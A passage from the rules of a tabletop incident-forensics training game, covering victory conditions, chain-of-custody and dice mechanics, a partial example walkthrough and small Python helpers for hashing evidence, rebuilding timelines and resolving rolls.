- Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80%
- Outcome: "Your investigation successfully attributes this attack to [Known Threat Group]. Security intelligence briefing prepared."

Victory Condition 2: "Solid Case"
- Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70%
- Outcome: "Your forensic report is publishable quality and defensible in court. Law enforcement briefed."

Victory Condition 3: "Partial Findings"
- Any two Progress Meters ≥ 70% at game end
- Outcome: "Investigation concluded. Findings are actionable for hardening and threat intelligence."

Precedence (v2.2):
- Victory conditions are always checked FIRST. The old "any meter < 40% = failure" clause is DELETED (it conflicted with Victory Condition 3): a low meter never overrides a met victory condition.
- Budget exhaustion is NOT a loss. The game continues to the turn limit: you may always take the cheap 5-Budget actions (Analyze Existing Evidence, Follow Investigative Lead, LOG-01, TIMELINE-01) while Budget lasts, and even at 0 Budget the team keeps playing (narrating connections, re-checking victory at game end). Victory conditions are still checked normally.

Penalty for Inconclusive Investigation:
- Cannot feed findings into Hardening or Network Building modules
- Audit & Compliance module must assess with incomplete information
- Reduced confidence in future threat intelligence
Every Evidence card must be documented to maintain admissibility in legal proceedings.
Earning Chain of Custody (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This is in addition to any Chain of Custody impact printed on the Evidence card itself.
How It Works:
- When an Evidence card is discovered, mark how it was obtained (which Investigation Action) and state how it was preserved
- If chain of custody is broken (evidence obtained illegally or improperly), it becomes inadmissible
- Inadmissible evidence cannot be used for Attribution or Timeline building
- Cost to fix a broken chain: 5 Budget + 1 turn to re-document the evidence
Example:
Evidence "Admin Credentials Exfiltrated" discovered via "Memory Dump Analysis" (legal). Chain of custody: intact. Can be used in court. But if same evidence discovered via "Unauthorized System Access" by Blue Team (illegal), chain is broken and evidence is inadmissible.
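The custody rule above, as an added example (not part of the Incident Zero rules or card decks): a small ledger that hashes each artifact when an Evidence card is discovered, pays the +5% handling bonus only when preservation was stated, marks improperly acquired evidence inadmissible, detects later tampering by re-hashing, and charges the 5 Budget + 1 turn re-documentation cost. The log export is constructed sample data; the "improper methods" set and the handler names are assumptions for the demo.

```python
"""Chain-of-custody ledger for discovered Evidence cards (added example)."""
import hashlib
from dataclasses import dataclass, field

# Constructed sample artifact: two lines of a signed log export.
SAMPLE_LOG_EXPORT = (
    b"2024-03-03T01:55:00Z db-srv01 sshd: Accepted password for admin from 198.51.100.23\n"
    b"2024-03-03T02:35:00Z db-srv01 cron: (admin) CMD (/tmp/.upd --beacon)\n"
)

# Acquisition methods the rules call improper (assumed list for this demo).
IMPROPER_METHODS = {"Unauthorized System Access"}


@dataclass
class CustodyEntry:
    evidence_id: str
    acquired_via: str        # Investigation Action (or method) that produced it
    preserved_by: str        # how it was preserved, e.g. "signed export, SHA-256 hashed"
    sha256: str              # digest taken at acquisition
    handler: str
    admissible: bool = True


@dataclass
class CustodyLedger:
    entries: dict = field(default_factory=dict)

    def record(self, evidence_id, acquired_via, preserved_by, payload, handler):
        """Log the discovery and hash the artifact so later tampering is detectable."""
        entry = CustodyEntry(
            evidence_id, acquired_via, preserved_by,
            hashlib.sha256(payload).hexdigest(), handler,
            admissible=acquired_via not in IMPROPER_METHODS,
        )
        self.entries[evidence_id] = entry
        return entry

    def handling_bonus(self, evidence_id):
        """+5% Chain of Custody only if preservation was stated at discovery (v2.2)."""
        return 5 if self.entries[evidence_id].preserved_by else 0

    def verify(self, evidence_id, payload):
        """Re-hash the artifact; a mismatch breaks the chain (evidence becomes inadmissible)."""
        entry = self.entries[evidence_id]
        intact = hashlib.sha256(payload).hexdigest() == entry.sha256
        if not intact:
            entry.admissible = False
        return intact

    def usable_for_attribution(self, evidence_id):
        """Inadmissible evidence cannot feed Attribution or Timeline building."""
        return self.entries[evidence_id].admissible

    def redocument(self, evidence_id, payload, handler):
        """Fix a broken chain: re-hash and re-record. Returns the (Budget, turns) cost."""
        entry = self.entries[evidence_id]
        entry.sha256 = hashlib.sha256(payload).hexdigest()
        entry.handler = handler
        entry.admissible = True
        return (5, 1)
```

Record the artifact bytes at the moment of discovery, not later: the digest is only meaningful as custody evidence if it was taken before anyone else touched the export.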
More sophisticated attacks may include anti-forensics measures that complicate investigation.
Anti-Forensics Examples:
- Log deletion or manipulation
- Encrypted communication channels
- Malware that overwrites disk sectors
- Timeline obfuscation (backdated files, timezone manipulation)

How It Works:
- Threat Orchestrator can note that certain Investigation Actions are harder due to anti-forensics
- Affected Investigation Cards gain a +2 DC penalty if anti-forensics is present
- Example: "Evidence logs were deleted. Log Analysis (DC 11) now has DC 13."

Overcoming Anti-Forensics:
- Investigators can use advanced techniques (Memory Forensics, Network Traffic Analysis) that bypass deleted logs
- Alternatively, combine multiple Investigation Actions to corroborate the timeline from different sources
- Example: "Timeline can't be built from deleted logs, but network traffic shows exfiltration at 2:15 AM, and memory analysis shows C2 connection at 2:10 AM. We can reconstruct it."
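The corroboration approach in the example above, as an added example (not part of the game's materials): events recovered from independent sources (network capture, memory image, file system) are normalized to UTC and merged into one timeline, the sources that agree within a window are reported, and file timestamps that sit far before the earliest live evidence are flagged as likely backdated (the rules list backdating and timezone manipulation among anti-forensics measures). All events are constructed sample data; the 30-minute corroboration window and 7-day slack are assumed tolerances.

```python
"""Rebuild a timeline from corroborating sources when logs were deleted (added example)."""
from datetime import datetime, timedelta, timezone

# Constructed events: (source, ISO-8601 timestamp with offset, description).
# The file-system stamp is local time (UTC-5) and has been backdated by months.
RAW_EVENTS = [
    ("memory", "2024-03-03T02:10:00+00:00", "C2 connection to 203.0.113.45 from injected process"),
    ("network", "2024-03-03T02:15:00+00:00", "Outbound transfer to 203.0.113.45 (exfiltration)"),
    ("filesystem", "2023-11-01T09:00:00-05:00", "/tmp/.upd mtime (persistence binary)"),
    ("network", "2024-03-03T01:55:00+00:00", "Admin login from 198.51.100.23"),
]


def normalize(events):
    """Parse each timestamp, convert it to UTC, and sort chronologically."""
    out = []
    for source, stamp, desc in events:
        ts = datetime.fromisoformat(stamp).astimezone(timezone.utc)
        out.append((ts, source, desc))
    return sorted(out)


def reconstruct_timeline(events):
    """Ordered (UTC ISO time, source, description) rows for the report."""
    return [(ts.strftime("%Y-%m-%dT%H:%M:%SZ"), src, desc) for ts, src, desc in normalize(events)]


def corroborating_sources(events, window_minutes=30):
    """Sources that place activity inside one window around the first network event.
    Two or more independent sources make the reconstructed sequence defensible."""
    timeline = normalize(events)
    anchor = next(ts for ts, src, _ in timeline if src == "network")
    window = timedelta(minutes=window_minutes)
    return sorted({src for ts, src, _ in timeline if abs(ts - anchor) <= window})


def suspicious_backdating(events, slack_days=7):
    """File-system artifacts stamped well before the earliest non-file-system evidence
    cannot be trusted as-is; return their descriptions. slack_days is an assumed tolerance."""
    timeline = normalize(events)
    first_live = min(ts for ts, src, _ in timeline if src != "filesystem")
    return [desc for ts, src, desc in timeline
            if src == "filesystem" and ts < first_live - timedelta(days=slack_days)]
```

Flagged artifacts are not discarded: they still matter for the attack chain, but their timestamps should be corroborated from another source (for example the memory image or network capture) before they feed the Timeline meter.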
Represents how long the attacker remained in the network before detection or expulsion.
Mechanics (v2.2):
- If the scenario states the attacker dwelled undetected 3+ turns (or the preceding Incident Response module ran 10+ turns), apply +1 DC to DISK and LOG investigations (evidence degraded).
- Longer dwell time = more data exfiltrated, more persistence mechanisms installed, harder to attribute
- But longer dwell also = more evidence: the TO may make 1-2 additional Evidence cards discoverable (more actions, more forensic artifacts)
Example:
Scenario states the attacker dwelled undetected for 4 turns before the investigation began. DISK-01, DISK-02, LOG-01, and LOG-02 all have +1 DC (evidence degraded over time). But the Blue Team can discover more Evidence cards (+2 cards total) due to the attacker's extended activity.
Some investigations may yield partial or fragmentary evidence that requires interpretation.
How It Works:
- Partial success on an Investigation roll = discover an Evidence card marked "INCOMPLETE"
- INCOMPLETE Evidence provides +1 Progress Meter advance but is NOT admissible alone for conclusions
- Team can retry the investigation next turn to complete the evidence (costs full Budget again)
- Or the team can interpret incomplete evidence by rolling d20 + investigator skill vs. DC 12
  - Success: Use incomplete evidence as-is (risky but saves Budget)
  - Failure: Incomplete evidence leads to a false conclusion (Red Herring card added)
Investigation cards list meter advances AND discovered Evidence cards list their own meter impacts. Never apply both.
How It Works:
- When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts.
- The investigation card's own "Advance" line applies only when no Evidence card is produced — e.g., a partial success that yields fragments, or a success when no suitable undiscovered Evidence card remains.
- The +5% Chain of Custody handling bonus (Rule 1, v2.2) still applies on top of the Evidence card's printed impacts — it rewards documentation, not discovery.
Base Skill Modifiers (apply to all Investigation rolls):
| Background | Modifier | Example |
|---|---|---|
| Forensic Analyst or Incident Responder | +2 | Person with formal training |
| IT Security or System Administrator | +1 | Technical background but not formal IR training |
| General IT | +0 | Basic tech knowledge |
| Non-Technical | -2 | No technical background |
| Forensics Researcher (GIAC GCFE, etc.) | +3 | Expert-level investigator |
Situational Modifiers:
- +1: Detailed narrative explanation of investigation methodology
- +2: Team describes an investigation approach that references the MITRE ATT&CK framework
- +1: Prior Investigation Action discovered clues to the current investigation
- -2 (v2.2): Attempting hastily (team taking Forensics as a last-ditch effort in the final turn)
- -2: Investigation approach is technically unsound or unrealistic
When playing Forensics as a standalone game (without prior IR/DR):
Note which investigation techniques would discover each threat
Blue Team Briefing:
"You've been called to investigate a data breach discovered during routine system maintenance. Initial assessment:
- Critical database server accessed 2 weeks ago
- 5 million customer records potentially compromised
- Attacker origin and motivations unknown
- You have [TURN COUNT] turns to reconstruct the attack and find attribution clues.
- Starting Budget: 75 (or 100 for a well-funded incident response team)"
Available Actions:
Follow Investigative Leads
Victory Conditions (v2.2):
Sequence 1: Detect & Investigate (90 minutes)
- Incident Response (45 min) - Detect attack chain
- Forensics (45 min) - Investigate and attribute

Sequence 2: Failure & Investigation (120 minutes)
- Incident Response (45 min) - Fail to detect all threats
- Disaster Recovery (45 min) - Manage breach crisis
- Forensics (30 min) - Investigate for lessons learned

Sequence 3: Complete Lifecycle (180+ minutes)
- Network Building (45 min) - Design initial network
- Hardening (45 min) - Build defenses
- Incident Response (45 min) - Test defenses
- Disaster Recovery (45 min) - Handle failure
- Forensics (30 min) - Investigate findings
- Audit & Compliance (30 min) - Assess overall security posture
After Forensics concludes, facilitate discussion around these questions:
Investigation Process:
1. What investigation techniques were most revealing? Why?
2. What evidence was most critical to understanding the attack?
3. What was the attacker's most sophisticated technique? What made it hard to detect forensically?
4. How would the investigation have been different with better logging? Better endpoint tools?

Attribution & Intelligence:
1. What threat actor profile emerged? What's their likely motivation?
2. What geographic or geopolitical clues do you see in the evidence?
3. How would you share this intelligence with law enforcement or information sharing communities?

Hardening & Prevention:
1. Based on forensic findings, what specific defenses would prevent this attack?
2. How would your network design need to change to limit lateral movement?
3. What logging and monitoring would have caught this earlier?

Real-World Connection:
1. How does this scenario compare to actual breaches you've studied? (Verizon DBIR, Microsoft Security Incidents, etc.)
2. What's the typical cost of a forensic investigation in real incidents?
3. How does attribution accuracy impact threat intelligence and policy response?
Each Investigation Action card and Evidence card should reference specific MITRE ATT&CK techniques/procedures:
Investigation Actions → Techniques Discovered:
- Disk Forensics → T1005 (Data from Local System), T1025 (Data from Removable Media)
- Memory Forensics → T1112 (Modify Registry), T1055 (Process Injection)
- Log Analysis → T1071 (Application Layer Protocol), T1090 (Proxy)
- Network Analysis → T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol)
- Malware Analysis → T1104 (Multi-Stage Channels), T1059 (Command and Scripting Interpreter)
- Timeline Reconstruction → T1074 (Data Staged), T1003 (OS Credential Dumping)
- Attribution → G#### group / S#### software identification (threat attribution)
TIER 1 (6-8 turns): Unsophisticated attacker, plenty of artifacts, obvious malware
- Low DC (10-12) Investigation Actions
- Evidence cards plentiful and obvious
- Chain of custody intact
- No anti-forensics measures
- Example: Script kiddie using public exploits, little cleanup

TIER 2 (8-10 turns): Standard attacker, some cleanup, moderate sophistication
- Medium DC (12-14) Investigation Actions
- Evidence cards present but require analysis
- Some chain of custody concerns
- Basic anti-forensics (log deletion)
- Example: Credential theft ring, lateral movement, data exfil

TIER 3 (11-13 turns): Sophisticated attacker, significant obfuscation
- High DC (13-15) Investigation Actions
- Evidence requires correlation across multiple sources
- Chain of custody a significant challenge
- Advanced anti-forensics (encryption, timeline spoofing)
- Example: APT group with operational security discipline

TIER 4 (14-15 turns): Nation-state or elite attackers, expert anti-forensics
- Very high DC (14-16+) Investigation Actions
- Evidence heavily fragmented and incomplete
- Chain of custody nearly impossible to prove
- Sophisticated anti-forensics and counter-attribution
- Example: State-sponsored APT with deep technical expertise
See cards/forensics/core-deck/investigation-cards.md for printable Investigation Action cards.
See cards/forensics/core-deck/evidence-cards.md for printable Evidence and Findings cards.
Setup: Select complexity tier, roll d4, announce turn count
Actions: Conduct Investigation (card cost, Duration 1-3 turns), Analyze Evidence (5 Budget, each Evidence card only once), Follow Leads (5 Budget)
Rolls: d20 vs. DC, with skill modifiers; partial success on DC-2 to DC-1
Durations (v2.2): Duration N resolves at the start of turn N, counting the starting turn as turn 1 (Duration 1 = immediate); only one multi-turn investigation in flight at a time
Resources: Budget (75 base, tracker 0-100), Turns (6-15), Progress Meters (4 tracked)
Victory (v2.2):
- V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
- V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
- V3 "Partial Findings": any two meters ≥70% at game end
Failure (v2.2): At the turn limit, no victory condition met. Victory conditions are checked first; there is no meter-minimum failure clause and budget exhaustion is not a loss.
docs/standalone-games/forensics.md
Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)" — see the module rules doc for the full change list) Duration: 45-90 minutes Player Count: 1 Threat Orchestrator + 1-4 Investigators Complexity: Intermediate to Advanced
This guide explains how to play the Forensics Module as a standalone game, without needing to have played Incident Response, Hardening, or Disaster Recovery first.
In standalone Forensics, you are a team of incident investigators called in to analyze a data breach. Your goal is to reconstruct the attack, discover the attacker's techniques, and if possible, attribute the breach to a known threat actor. This is a "detective" game focused on piecing together evidence rather than detecting or preventing attacks.
The Threat Orchestrator (game facilitator) selects an attack complexity tier. Do NOT tell the Blue Team the tier—it's secret.
| Tier | Turn Count | Attack Type | Example |
|---|---|---|---|
| TIER 1 (Beginner) | 6-8 | Script kiddie, basic malware | Casual cybercriminal, obvious techniques |
| TIER 2 (Intermediate) | 8-10 | Organized attacker, some sophistication | Credential theft ring, lateral movement |
| TIER 3 (Advanced) | 11-13 | Skilled APT, heavy obfuscation | Sophisticated threat group with operational security |
| TIER 4 (Expert) | 14-15 | Nation-state, elite techniques | State-sponsored APT with counter-forensics |
Turn Count Randomization:
- Select your chosen tier's baseline (6-8, 8-10, 11-13, or 14-15)
- Roll d4: -1, 0, 0, or +1
- Add the result to the baseline to get the final turn count
- Example: TIER 2 (8-10) + d4 result of +1 = final turn count of 9-11 turns
Secret TO Preparation:
Consider realistic attack flow: not every attack needs all phases
Map Investigations: For each threat card, note which Investigation Actions would discover it
Example: Credential abuse → Event Log Analysis
Plan Evidence Discovery: Prepare which Evidence cards will be revealed as each Investigation Action succeeds
Some evidence cards might be discovered by multiple investigation paths
Set Attacker Profile: In your notes, decide:
Example Secret Setup (TIER 2):
Threat Cards Selected: Phishing → Credential Harvesting → Lateral Movement → Persistence → Exfiltration
Turn Count: 8-10 (TIER 2, no roll modifier used)
Attacker Profile: Eastern European cybercriminal group focused on financial data theft
Key Evidence: Phishing email headers, malware samples, persistence mechanisms, C2 communications
Attribution Clues: Russian language in malware, specific tool signature, Bitcoin payment addresses
Investigation Challenge: Attacker deleted logs; Blue Team must reconstruct from network traffic and memory forensics
Read the Incident Briefing to all investigators:
INCIDENT BRIEFING
"You've been called by [Company Name] to investigate a data breach discovered during routine system maintenance. Here's what we know so far:
Timeline of Discovery:
- System administrator noticed unusual network traffic on [Date]
- Forensic examination discovered evidence of system compromise dating back approximately [2-3 weeks / 1 month]
- Data breach notification team estimates millions of records may have been accessed

What Was Affected:
- Database servers containing customer information
- Admin accounts showing unauthorized access
- Backup systems with potential exfiltration evidence

Your Mission:
- Reconstruct the complete attack chain (how did they get in? what did they do? how did they get out?)
- Identify what data was compromised (scope and sensitivity)
- Attribute the attack to a known threat group or attacker profile if possible
- Produce findings for the company's security hardening and incident prevention

Resources Available:
- Forensic laboratory time: 75 Budget units
- [Optional: +25 if company has cyber insurance or threat intelligence subscription]
- Investigation period: [TURN COUNT] turns (represents [1-3 weeks] of forensic work)

Regulatory Context:
- Time-sensitive: Investigation results feed into breach notification requirements
- Chain of custody critical: Findings must be admissible if this goes to law enforcement
You have [TURN COUNT] turns. Begin your investigation."
On a shared board or spreadsheet, create:
One investigator (or the whole team collectively) describes what forensic investigation they want to perform.
Options:
Option A: Conduct Investigation
- Choose an Investigation Action card (Disk Forensics, Memory Analysis, Log Analysis, Network Traffic, Malware Analysis, Timeline Reconstruction, or Threat Attribution)
- Describe HOW they'll conduct the investigation (methodology, tools, expected findings)
- Declare the Budget cost (shown on card) — paid on the turn you start
- Note the card's Duration (v2.2): starting the investigation is your action this turn; counting this turn as turn 1, the roll and results arrive at the START of turn N (Duration 1 = same turn, Duration 2 = start of next turn, Duration 3 = two turns later). Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting.
- Example: "We'll do a full disk image of the compromised database server and look for persistence mechanisms, rootkits, and artifact evidence. Cost 10 Budget, Duration 2 — results at the start of next turn."

Option B: Analyze Existing Evidence — Cost: 5 Budget (v2.2)
- Review 2-4 Evidence cards already discovered — each Evidence card can be Analyzed only once (v2.2); mark cards as Analyzed
- Describe connections between findings (temporal sequence, technical relationships, or attribution links)
- Example: "The malware sample matches the persistence mechanism we found in scheduled tasks, suggesting the attacker knew exactly what they were doing. Plus, the C2 domain was registered by the same person who registered two other domains we found in old breach reports."

Option C: Follow Investigative Lead — Cost: 5 Budget (v2.2)
- Pick an Evidence card with an "Investigative Lead" noted
- Describe how you'll pursue this lead
- Example: "This C2 domain resolves to a Russian ASN. Let's do a WHOIS lookup and see what other domains are hosted on this infrastructure."
For Conduct Investigation or Follow Investigative Lead:
If insufficient Budget, investigation cannot proceed (suggest alternative action)
Apply Duration (v2.2): For a Duration 2-3 investigation, the cost and action are spent now, but steps 3-5 happen at the START of the turn the investigation completes (Duration 1 resolves immediately)
Set Difficulty Class (DC): TO checks Investigation Action card for DC
Modify DC if attacker was sophisticated: +1-2 DC
Determine Modifiers: Apply skill modifiers to the roll
-2 if attempting hastily (rushed, final turn desperation) (v2.2)
Roll: Investigator (or TO on their behalf) rolls d20
Compare Results:
For Analyze Existing Evidence:
| Card | DC | Cost | Duration | What It Reveals |
|---|---|---|---|---|
| DISK-01: Disk Image & Analysis | 12 | 10 | 2 turns | Deleted files, malware samples, persistence mechanisms |
| DISK-02: File System Carving | 14 | 15 | 3 turns | Deep file recovery, hidden artifacts, encrypted data |
| MEM-01: Memory Dump & Analysis | 13 | 15 | 2 turns | Volatile processes, injected code, C2 connections |
| MEM-02: Memory Forensics Deep Dive | 15 | 20 | 3 turns | Malware behavior analysis, encryption keys, exploits |
| LOG-01: Event Log Analysis | 11 | 5 | 1 turn | User login timeline, privilege escalation, admin actions |
| LOG-02: Deep Log Correlation | 13 | 10 | 2 turns | Cross-system timeline, attack sequence, lateral movement |
| NET-01: Network Traffic Analysis | 12 | 10 | 2 turns | Exfiltration evidence, C2 communications, data flows |
| NET-02: Packet Capture Deep Analysis | 14 | 15 | 3 turns | Protocol forensics, attacker tools, communication patterns |
| MALW-01: Malware Analysis (Dynamic) | 12 | 15 | 2 turns | Behavior analysis, IOCs, capabilities |
| MALW-02: Malware Analysis (Static) | 14 | 10 | 2 turns | Code reverse engineering, attacker signatures, techniques |
| TIMELINE-01: Timeline Reconstruction | 13 | 5 | 1 turn | Chronological attack sequence, entry and exit points |
| THREAT-01: Threat Attribution Analysis | 15 | 20 | 3 turns | Link to known threat groups, TTPs, motivation |
DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1. Duration rule: results arrive at the start of the turn the Duration completes — see Turn Sequence.
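The resolution rules from the Turn Sequence and the card table above, as an added example (not the game's own tooling): card DC plus the situational DC penalties (+2 for anti-forensics, +1 for DISK/LOG cards after 3+ turns of dwell, the TO's +1-2 for a sophisticated attacker), the partial-success band of DC-2 to DC-1, the Analyze Existing Evidence check (DC 10 with its +2/+1 narrative modifiers), Duration resolution at the start of turn start + Duration - 1, the DISK-01 rush price, and a scheduler that enforces one multi-turn investigation in flight. Card stats are copied from the table; the `Scheduler` class and its error messages are my own.

```python
"""Investigation roll resolver and Duration scheduler for the Forensics module (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Card:
    code: str
    dc: int
    cost: int
    duration: int


# Subset of the printed Investigation Action cards: (DC, Cost, Duration) from the table.
CARDS = {
    "LOG-01": Card("LOG-01", 11, 5, 1),
    "DISK-01": Card("DISK-01", 12, 10, 2),
    "MALW-01": Card("MALW-01", 12, 15, 2),
    "NET-01": Card("NET-01", 12, 10, 2),
    "TIMELINE-01": Card("TIMELINE-01", 13, 5, 1),
    "MEM-02": Card("MEM-02", 15, 20, 3),
}


def effective_dc(card, anti_forensics=False, dwell_turns=0, sophistication=0):
    """Card DC plus the situational DC penalties the rules describe."""
    dc = card.dc
    if anti_forensics:
        dc += 2                      # "Affected Investigation Cards gain +2 DC"
    if dwell_turns >= 3 and card.code.split("-")[0] in ("DISK", "LOG"):
        dc += 1                      # dwell of 3+ turns degrades disk and log evidence
    return dc + sophistication       # TO's +1-2 DC for a sophisticated attacker


def outcome(d20, modifiers, dc):
    """'success' at DC or above, 'partial' in the DC-2..DC-1 band, otherwise 'failure'."""
    total = d20 + modifiers
    if total >= dc:
        return "success"
    if total >= dc - 2:
        return "partial"
    return "failure"


def analyze_check(d20, skill, cards_connected, cites_attack_technique):
    """Analyze Existing Evidence: d20 + skill (+2 for 3+ cards, +1 for an ATT&CK
    reference) against DC 10; True on success."""
    bonus = (2 if cards_connected >= 3 else 0) + (1 if cites_attack_technique else 0)
    return d20 + skill + bonus >= 10


def resolves_on(start_turn, duration):
    """Counting the starting turn as turn 1, results land at the start of this turn."""
    return start_turn + duration - 1


def disk01_rush_cost():
    """v2.2 rush option: +5 Budget to run DISK-01 at Duration 1."""
    return CARDS["DISK-01"].cost + 5


class Scheduler:
    """Tracks Budget and enforces 'only one multi-turn investigation in flight'."""

    def __init__(self, budget):
        self.budget = budget
        self.in_flight = None        # (card, resolve_turn) or None

    def can_start(self, card, turn):
        if self.budget < card.cost:
            return False             # insufficient Budget: suggest a cheaper action
        pending = self.in_flight is not None and self.in_flight[1] > turn
        return not (card.duration > 1 and pending)

    def start(self, card, turn):
        """Pay the cost now; return the turn at whose start the results arrive."""
        if not self.can_start(card, turn):
            raise ValueError(f"cannot start {card.code} on turn {turn}")
        self.budget -= card.cost
        done = resolves_on(turn, card.duration)
        if card.duration > 1:
            self.in_flight = (card, done)
        return done
```

Replaying the walkthrough below with this code (LOG-01 on turn 1, MALW-01 on turn 2, NET-01 on turn 3, TIMELINE-01 on turn 4, MEM-02 on turn 5) reproduces its budget line of 70, 55, 45, 40, 20 and the turn-7 resolution of MEM-02.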
Blue Team wins if they achieve ONE of these (canonical v2.2 conditions — identical to the module rules):
Victory Condition 1: "Full Attribution"
- Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80%
- Result: "You have successfully attributed this attack to [Threat Group]. Intelligence briefing prepared for leadership."

Victory Condition 2: "Solid Case"
- Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70%
- Result: "Your forensic investigation is publishable quality and legally defensible. Law enforcement briefed."

Victory Condition 3: "Partial Findings"
- Any two Progress Meters ≥ 70% at game end
- Result: "Investigation concluded with sufficient findings for remediation. Hardening team can now implement controls."
Blue Team fails if, at the turn limit, no victory condition is met.
Precedence (v2.2): Victory conditions are always checked FIRST. There is no "any meter < 40% = failure" clause (deleted — it conflicted with Victory Condition 3), and budget exhaustion is not a loss: you may always fall back on the cheap 5-Budget actions while Budget lasts, and the game simply plays out to the turn limit.
Result of failure: "Investigation stalled. Too many unanswered questions. Threat actor remains unidentified. Forensic team recommends additional investigation by external firm."
Consequence of Failure:
- Investigation results are incomplete and cannot feed into Hardening or Network Building modules
- Audit & Compliance module must assess security posture with incomplete information
- Organization loses confidence in threat intelligence
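The three victory conditions and the v2.2 precedence rules stated here (and identically in the module rules earlier on this page), as an added example rather than the game's own tooling: victory is checked first, a low meter never overrides a met condition, Condition 3 counts only at game end, and Budget is ignored entirely because exhaustion is not a loss. The meter field names and the "ongoing"/"failure" labels are my own.

```python
"""Victory-condition checker for the Forensics module, v2.2 precedence (added example)."""
from dataclasses import dataclass


@dataclass
class Meters:
    timeline: int            # Timeline Completeness, 0-100
    attack_chain: int        # Attack Chain Reconstruction
    attribution: int         # Attribution Confidence
    chain_of_custody: int    # Evidence Chain of Custody

    def values(self):
        return [self.timeline, self.attack_chain, self.attribution, self.chain_of_custody]


def check_victory(m, game_end):
    """Return the first victory condition met, or None. Conditions are checked in
    order; no minimum-meter clause exists, so a low meter never cancels a win."""
    if m.attribution >= 90 and m.timeline >= 80:
        return "V1 Full Attribution"
    if m.timeline >= 80 and m.attack_chain >= 80 and m.chain_of_custody >= 70:
        return "V2 Solid Case"
    if game_end and sum(v >= 70 for v in m.values()) >= 2:
        return "V3 Partial Findings"      # only checked at game end
    return None


def game_state(m, turn, turn_limit, budget):
    """'victory: <condition>', 'failure' at the turn limit with nothing met, else 'ongoing'.
    budget is accepted but deliberately unused: exhaustion is not a loss (v2.2)."""
    at_end = turn >= turn_limit
    won = check_victory(m, at_end)
    if won:
        return "victory: " + won
    return "failure" if at_end else "ongoing"
```

The walkthrough below ends with Timeline 100%, Attack Chain 100%, Attribution 95% and Chain of Custody 30%; with this checker that state on turn 8 of 8 reports Condition 1, and the same meters with Timeline still at 75% would have fallen through to Condition 3 at game end.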
TIER 2 attack: Credential-based lateral movement with persistence
Turn limit: 8 turns (TIER 2 baseline 9, d4 roll of -1)
Attacker profile: Eastern European cybercriminal group
Key technique: Password spray → Privilege escalation → Scheduled task persistence → Data exfiltration
Bonus: The sysadmin's initial triage captured a suspicious binary, so a malware sample is available from turn 1
Blue Team: "We'll start with event log analysis of the compromised database server. We want to see the login history and identify unusual access patterns. We'll export the logs with their digital signatures and hash the export."
Investigator Skill: IT Security background (+1)
TO Facilitator:
1. Check Cost: LOG-01 costs 5 Budget. Current budget 75. ✓ OK
2. Check Duration: LOG-01 is Duration 1 — resolves this turn
3. Set DC: LOG-01 has DC 11. No anti-forensics. DC = 11
4. Apply Modifiers: +1 (IT security background) + 0 (no prior clues) = +1 total
5. Roll: Investigator rolls d20+1. d20 = 13, total 14
6. Success! (14 ≥ 11) → Discover Evidence card EVD-04 "Suspicious Admin Login (Timeline)" — apply ONLY its printed impacts (v2.2 No Double Counting)

Update Tracking:
- Budget: 75 - 5 = 70 remaining
- Turn: 1 → 2
- EVD-04 printed impacts: Timeline 0% → 25%, Attack Chain 0% → 20%, Attribution 0% → 10%
- Chain of Custody: 0% → 5% (v2.2: preservation stated — signed log export, hashed)
- Evidence Log: "EVD-04 - discovered via LOG-01 - preserved via signed/hashed export - Chain of Custody: intact"
Blue Team Deduction: "Looks like an admin account was accessed from unusual locations. Might be credential theft."
Blue Team: "Let's analyze that malware sample from triage. We want to understand what it does and where it connects to."
Investigator Skill: Forensic certification background (+2)
TO Facilitator:
1. Check Cost: MALW-01 costs 15 Budget. Current budget 70. ✓ OK
2. Check Duration (v2.2): MALW-01 is Duration 2. Starting the sandbox run is this turn's action; the roll and results arrive at the START of turn 3. MALW-01 is now the one multi-turn investigation in flight.

Update Tracking:
- Budget: 70 - 15 = 55 remaining
- Turn: 2 → 3
- Meters: unchanged (results pending) — Timeline 25%, Attack Chain 20%, Attribution 10%, Chain of Custody 5%

Start of turn — MALW-01 resolves (v2.2 Duration):
1. Set DC: MALW-01 has DC 12. Attacker was moderately sophisticated: +1. DC = 13
2. Apply Modifiers: +2 (forensic cert)
3. Roll: d20 = 14, total 16
4. Success! (16 ≥ 13) → Discover EVD-02 "Command-and-Control Callback Domain"
   - EVD-02 printed impacts: Attack Chain 20% → 35%, Attribution 10% → 35%, Timeline 25% → 30%
   - Chain of Custody: 5% → 10% (v2.2: sample hashed, sandbox logs archived)
Turn 3 action — Blue Team: "Now let's look at network flow records for that C2 domain. Start NET-01."
TO Facilitator: NET-01 costs 10 (budget 55 → 45 ✓), Duration 2 — resolves at the start of turn 4. (Allowed: MALW-01 finished this turn, so only one investigation is in flight.)
Update Tracking:
- Budget: 45 remaining
- Turn: 3 → 4
- Meters: Timeline 30%, Attack Chain 35%, Attribution 35%, Chain of Custody 10%
Blue Team Deduction: "The malware communicates with an external server. That's how the attacker stays in control."
Start of turn — NET-01 resolves (v2.2 Duration):
1. Set DC: NET-01 has DC 12
2. Apply Modifiers: +1 (IT security background)
3. Roll: d20 = 9, total 10
4. Partial Success (10 is in the DC-2 to DC-1 band, 10-11) → Suspicious outbound traffic found, but the destination is unclear. No Evidence card produced, so apply NET-01's partial advance line: Attack Chain 35% → 45%, Attribution 35% → 40%. No Chain of Custody handling bonus (no Evidence card discovered).
Turn 4 action — Blue Team: "Let's try to reconstruct the timeline from what we have. TIMELINE-01."
TO Facilitator: TIMELINE-01 costs 5 (budget 45 → 40 ✓), Duration 1 — resolves now. DC 13, +2 (DFIR training). Roll: d20 = 8, total 10. Failure (10 < 11, below the DC-2 partial band). Too many timestamp gaps. Budget still spent.
Update Tracking:
- Budget: 40 remaining
- Turn: 4 → 5
